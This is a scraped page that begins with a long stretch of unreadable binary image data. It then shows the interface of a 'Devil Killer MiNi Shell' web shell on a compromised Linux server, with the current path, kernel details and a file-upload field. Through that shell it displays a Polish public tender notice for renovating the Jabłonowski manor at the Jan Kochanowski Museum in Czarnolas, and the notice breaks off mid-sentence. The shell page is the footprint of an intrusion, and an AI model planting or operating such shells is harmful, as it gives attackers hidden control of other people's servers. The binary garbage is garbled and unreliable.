JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20250616/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20250616/0027989801-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Renowacja Budynku dworu Jabłonowskich w Muzeum Jana Kochanowskiego <br/>w Czarnolesie. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Muzeum Jana Kochanowskiego w Czarnolesie</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 385557023</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Czarnolas 36</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Policzna</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">26-720</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL921 - Radomski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@muzeumkochanowski.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.muzeumkochanowski.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - państwowe i samorządowe instytucje kultury</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Rekreacja, kultura i religia</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Renowacja Budynku dworu Jabłonowskich w Muzeum Jana Kochanowskiego <br/>w Czarnolesie. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-4db8f614-e495-420d-8916-2c29dccbb6ed</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00279898</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-06-16</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00038156/03/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.2 Renowacja budynku dworu Jabłonowskich w Muzeum Jana Kochanowskiego w Czarnolesie.</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-4db8f614-e495-420d-8916-2c29dccbb6ed <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">1.W postępowaniu o udzielenie zamówienia publicznego komunikacja między<br/>Zamawiającym a Wykonawcami odbywa się przy użyciu platformy e-Zamówienia, dostępnej pod adresem:<br/>https://ezamowienia.gov.pl oraz za pośrednictwem poczty elektronicznej: marzena_barwicka@wp.pl - w sprawach proceduralnych.<br/>2.Korzystanie z Platformy e-Zamówienia jest bezpłatne.<br/>3.Adres strony internetowej prowadzonego postępowania: https://ezamowienia.gov.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1.Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego musi posiadać konto podmiotu „Wykonawca” na Platformie e-Zamówienia. Szczegółowe informacje na temat zakładania kont podmiotów oraz zasady i warunki korzystania z Platformy określa<br/>Regulamin Platformy e-Zamówienia dostępny na stronie internetowej https://ezamowienia.gov.pl oraz informacje zamieszczone w zakładce „Centrum Pomocy”.<br/>2.Przeglądanie i pobieranie publicznej treści dokumentacji postępowania nie wymaga posiadania konta na Platformie e-Zamówienia ani logowania.<br/>3.Sposób sporządzania dokumentów elektronicznych oraz ich przekazywania musi być zgodny z wymaganiami określonymi w rozporządzeniu Prezesa Rady Ministrów w sprawie wymagań dla dokumentów elektronicznych.<br/>4.Dokumenty elektroniczne, o których mowa w przepisach Pzp, sporządza się w postaci elektronicznej, w formatach danych określonych w przepisach rozporządzenia Rady Ministrów w sprawie Krajowych Ram Interoperacyjności i przekazuje się je jako załączniki.<br/>5.Informacje, oświadczenia lub dokumenty inne niż wymienione w przepisach rozporządzenia Prezesa Rady Ministrów w sprawie wymagań dla dokumentów elektronicznych, przekazywane w postępowaniu, sporządza się w postaci elektronicznej:<br/>a) w formatach danych określonych w przepisach rozporządzenia Rady Ministrów w sprawie Krajowych Ram Interoperacyjności i<br/>przekazuje się jako załączniki,<br/>b) jako tekst wpisany bezpośrednio do wiadomości przekazywanej przy użyciu środków komunikacji elektronicznej (np. w treści„Formularza do komunikacji”).<br/>6.Jeżeli dokumenty elektroniczne przekazywane przy użyciu środków komunikacji elektronicznej zawierają informacje stanowiące tajemnicę przedsiębiorstwa w rozumieniu przepisów ustawy z dnia 16 kwietnia 1993 r. o zwalczaniu nieuczciwej konkurencji, Wykonawca przekazuje je w wydzielonym i odpowiednio oznaczonym pliku, wraz z jednoczesnym zaznaczeniem w nazwie pliku „Dokument stanowiący tajemnicę przedsiębiorstwa”.<br/>7.Komunikacja w postępowaniu, z wyłączeniem składania ofert, odbywa się drogą elektroniczną za pośrednictwem „Formularzy do komunikacji” dostępnych na Platformie e-Zamówienia. Przez formularze przekazywane są m.in. wezwania, zawiadomienia, pytania i odpowiedzi. Formularze umożliwiają także dołączanie załączników.<br/>8.Możliwość korzystania z „Formularzy do komunikacji” w pełnym zakresie wymaga posiadania konta „Wykonawcy” na Platformie e-Zamówienia oraz zalogowania się na Platformie e-Zamówienia.<br/>9.Wszystkie wysłane i odebrane w postępowaniu wiadomości widoczne są po zalogowaniu w zakładce „Komunikacja”.<br/>10.Maksymalny rozmiar plików przesyłanych za pośrednictwem „Formularzy do komunikacji” wynosi 25 MB (łączna wielkość plików przesyłanych w jednym formularzu).<br/>11.Minimalne wymagania techniczne sprzętu używanego do korzystania z Platformy e-Zamówienia oraz informacje dotyczące specyfikacji połączenia określa Regulamin Platformy e-Zamówienia.<br/>12.W przypadku problemów technicznych i awarii Platformy e-Zamówienia użytkownicy mogą skorzystać ze wsparcia technicznego dostępnego poprzez formularz na stronie internetowej https://ezamowienia.gov.pl w zakładce „Zgłoś problem”.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE)<br/>2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”, Zamawiający informuje, że:<br/>1. administratorem Pani/Pana danych osobowych jest Muzeum Jana Kochanowskiego w Czarnolesie, ul. Czarnolas 36, 26-720<br/>Policzna, dane kontaktowe Inspektora ochrony danych osobowych e-mail: inspektor@cbi24.pl,.<br/>2. Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z niniejszym postępowaniem o udzielenie zamówienia publicznego,<br/>3. odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 18 oraz art. 74 ust. 1 i 2 ustawy Pzp, z tym, że udostępnienie danych, o których mowa w art. 10 RODO, może nastąpić w celu umożliwienia korzystania ze środków ochrony prawnej, o których mowa w Dziale IX ustawy Pzp, do upływu terminu ich<br/>wniesienia.<br/>4. Pani/Pana dane osobowe będą przechowywane do zgodnie z kategorią archiwalną akt B5, przez okres 5 lat od dnia zakończenia postępowania o udzielenie zamówienia.<br/>5. obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego;konsekwencje niepodania określonych danych wynikają z ustawy Pzp.<br/>6. w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosownie do art. 22<br/>RODO.<br/>7. posiada Pani/Pan:<br/>– na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących, z zastrzeżeniem art. 75 ustawy Pzp ,<br/>– na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych z zastrzeżeniem art. 19 ust. 2 i art. 76 ustawy<br/>Pzp ,<br/>– na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO , oraz art. 19 ust. 3 ustawy Pzp ,<br/>– prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO,</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Nie przysługuje Pani/Panu:<br/>– w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych,<br/>– prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO,<br/>– na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">DA.26.4.2025</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.Przedmiotem zamówienia jest wykonanie kompleksowych robót budowlano-konserwatorskich w zabytkowym budynku dworu Jabłonowskich, zlokalizowanym na terenie Muzeum Jana Kochanowskiego w Czarnolesie, zgodnie z dokumentacją projektową, przedmiarem robót oraz decyzją Mazowieckiego Wojewódzkiego Konserwatora Zabytków.<br/>2.Zakres prac obejmuje m.in.:<br/>a) Przywrócenie konstrukcji dachu do stanu pierwotnego (demontaż, wymiana i impregnacja elementów konstrukcyjnych więźby dachowej, deskowanie, zabezpieczenia grzybobójcze i ogniochronne),<br/>b) Renowację gzymsu wieńczącego (rozbiórka, odbudowa, zbrojenie, izolacje, tynki, malowanie),<br/>c) Remont pokrycia dachowego (wymiana i naprawa blachy, rynien i rur spustowych, zabezpieczenie otworów wentylacyjnych, montaż gzymsów z blachy tytan-cynk),<br/>d) Naprawę pęknięć ścian (rozkuwanie, iniekcja, mocowanie prętów spiralnych, przemurowania),<br/>e) Renowację elewacji (skuwanie i tynkowanie, reprofilacja i fugowanie spoin, impregnacje, hydrofobizacja, system tynków renowacyjnych, malowanie),<br/>f) Renowację sztukaterii (usuwanie farb, naprawy profili, oczyszczanie, szpachlowanie, malowanie, podcyzelowania detali architektonicznych),<br/>g) Montaż rusztowań oraz niezbędne osłony i zabezpieczenia,<br/>h) Prace pomocnicze, zabezpieczające i konserwatorskie (m.in. demontaż/montaż tablic, zabezpieczenie okien, czyszczenie i impregnacja powierzchni).<br/>3. Wymagania dodatkowe:<br/>a) Prace muszą być prowadzone zgodnie z dokumentacją projektową, decyzją konserwatorską oraz pozwoleniem na budowę.<br/>b) Wykonawca zapewni osobę posiadającą uprawnienia budowlane w specjalności konstrukcyjno-budowlanej do pełnienia funkcji kierownika budowy z doświadczeniem w pracach przy zabytkach.<br/>c) Użycie materiałów zgodnych z dokumentacją projektową oraz wytycznymi konserwatorskimi.<br/>d) Obowiązek opracowania i przekazania Zamawiającemu dokumentacji powykonawczej oraz karty gwarancyjnej. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45212313-3 - Roboty budowlane w zakresie muzeów</p> <p class="mb-0">45111300-1 - Roboty rozbiórkowe</p> <p class="mb-0">45453000-7 - Roboty remontowe i renowacyjne</p> <p class="mb-0">45262521-9 - Roboty murarskie w zakresie fasad</p> <p class="mb-0">45420000-7 - Roboty w zakresie zakładania stolarki budowlanej oraz roboty ciesielskie</p> <p class="mb-0">45261213-0 - Kładzenie dachów metalowych</p> <p class="mb-0">45410000-4 - Tynkowanie</p> <p class="mb-0">45442100-8 - Roboty malarskie</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2025-11-08</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający dokona oceny ofert przy zastosowaniu kryteriów oceny ofert określonych w SWZ.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie osoby wskazanej do pełnienia funkcji kierownika budowy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Warunek I<br/>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał należycie, zgodnie z zasadami sztuki budowlanej i prawidłowo ukończył co najmniej 2 zamówienia dotyczące renowacji elementów architektonicznych<br/>obiektów zabytkowych realizowane pod nadzorem konserwatora<br/>zabytków, o wartości robót nie mniejszej niż 150 000,00 zł brutto każde.<br/>UWAGA:<br/>Jeżeli wykonawca powołuje się na doświadczenie w realizacji robót budowlanych wykonywanych wspólnie z innymi wykonawcami, doświadczenie na potwierdzenie powyższego warunku dotyczy tylko robót, w których wykonaniu wykonawca ten bezpośrednio uczestniczył. Warunek nie podlega sumowaniu - jeden z wykonawców wspólnie ubiegających się o<br/>udzielenie zamówienia musi wykazać się całym wymaganym doświadczeniem. Analogicznie nie dopuszcza się sumowania doświadczenia przy poleganiu na zasobach innych podmiotów.<br/>Warunek II<br/>Dysponowanie kadrą techniczną:<br/>Wykonawca musi wykazać, że dysponuje lub będzie dysponował co najmniej:<br/>- Kierownikiem budowy – osoba posiadająca uprawnienia budowlane w specjalności konstrukcyjno-budowlanej bez ograniczeń oraz kwalifikacje zgodne z art. 37c ustawy o ochronie zabytków, tj. co najmniej 18 miesięcy doświadczenia przy robotach budowlanych prowadzonych przy zabytkach<br/>nieruchomych wpisanych do rejestru.<br/>UWAGA:<br/>Liczba nadzorowanych przez kierownika budowy robót budowlanych stanowi jedno z kryteriów oceny ofert. W przypadku ubiegania się o punkty w tym kryterium Wykonawca powinien do oferty załączyć wypełniony formularz (załącznik nr 2 do SWZ).<br/>Uprawnienia budowlane powinny być zgodne z ustawą Prawo budowlane oraz rozporządzeniem Ministra Inwestycji i Rozwoju w sprawie przygotowania zawodowego do wykonywania samodzielnych funkcji technicznych w budownictwie.<br/>Zamawiający zaakceptuje również odpowiadające im uprawnienia wydane w innych krajach UE.<br/>- Kierownikiem robót konserwatorskich– osoba spełniająca wymagania określone w art. 37a ustawy z dnia 23 lipca 2003 r. o ochronie zabytków i opiece nad zabytkami, tj. posiadająca odpowiednie kwalifikacje i doświadczenie przy prowadzeniu robót budowlanych lub konserwatorskich w obiektach wpisanych do rejestru zabytków.<br/>Osoba ta musi:<br/>1. Posiadać wykształcenie wyższe kierunkowe w zakresie konserwacji dzieł sztuki, architektury, malarstwa lub rzeźby albo posiadać inne kwalifikacje uznane za równoważne zgodnie z art. 37a ust. 1 i 2 ustawy z dnia 23 lipca 2003 r. o ochronie zabytków i opiece nad zabytkami (Dz. U. z 2024 r., poz. 1292),<br/>2. Posiadać co najmniej 18 miesięcy doświadczenia zawodowego w wykonywaniu lub nadzorze nad pracami konserwatorskimi prowadzonymi przy zabytkach nieruchomych wpisanych do rejestru zabytków.<br/>Wykonawca jest zobowiązany do:<br/>- wskazania imienia, nazwiska, kwalifikacji oraz doświadczenia ww. osoby w formularzu ofertowym,<br/>- przedstawienia dokumentów potwierdzających spełnianie ww. wymagań na wezwanie Zamawiającego.<br/>2.Poleganie na zasobach innych podmiotów:<br/>Stosownie do art. 118 Pzp, Wykonawca może w celu potwierdzenia spełniania warunków udziału w postępowaniu polegać na zdolnościach technicznych, zawodowych lub sytuacji ekonomicznej innych podmiotów. W<br/>odniesieniu do warunków dotyczących kwalifikacji zawodowych lub doświadczenia, podmioty te muszą zrealizować roboty budowlane, których dotyczą ich zdolności.<br/>3. Dokumenty potwierdzające udostępnienie zasobów: Wykonawca, który polega na zasobach innych podmiotów, składa wraz z ofertą:<br/>• Zobowiązanie podmiotu udostępniającego zasoby, potwierdzające rzeczywisty dostęp do nich (załącznik nr 8 do SWZ),<br/>• Dokumenty określające zakres udostępnienia zasobów, sposób i okres ich wykorzystania,<br/>• Informację czy podmiot ten wykona roboty budowlane, do których zdolności się odnosi. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1.Informacje o podmiotowych środkach dowodowych potwierdzających brak podstaw wykluczenia Wykonawcy z udziału w postępowaniu:<br/>1.1. Oświadczenie Wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 ustawy Pzp, w zakresie podstaw wykluczenia z postępowania, o których mowa w art. 108 ust. 1 oraz art. 109 ust. 1 pkt 4, 5, 7, 8, 10 ustawy Pzp.<br/>1.2. Oświadczenie Wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy Pzp, o braku przynależności do tej samej grupy kapitałowej, o której mowa w ustawie z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów, lub oświadczenie o przynależności wraz z dowodami potwierdzającymi niezależność przygotowania oferty.<br/>1.3. Oświadczenie Wykonawcy o aktualności informacji zawartych w oświadczeniu wstępnym w zakresie przesłanek wykluczenia określonych w art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę.<br/>UWAGA: Jeżeli Wykonawca polega na zasobach podmiotów trzecich, wymagane są analogiczne oświadczenia (pkt 1.1 i 1.3) również w odniesieniu do tych podmiotów.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Informacje o podmiotowych środkach dowodowych potwierdzających spełnianie warunków udziału w postępowaniu:<br/>1. Wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat przed upływem terminu 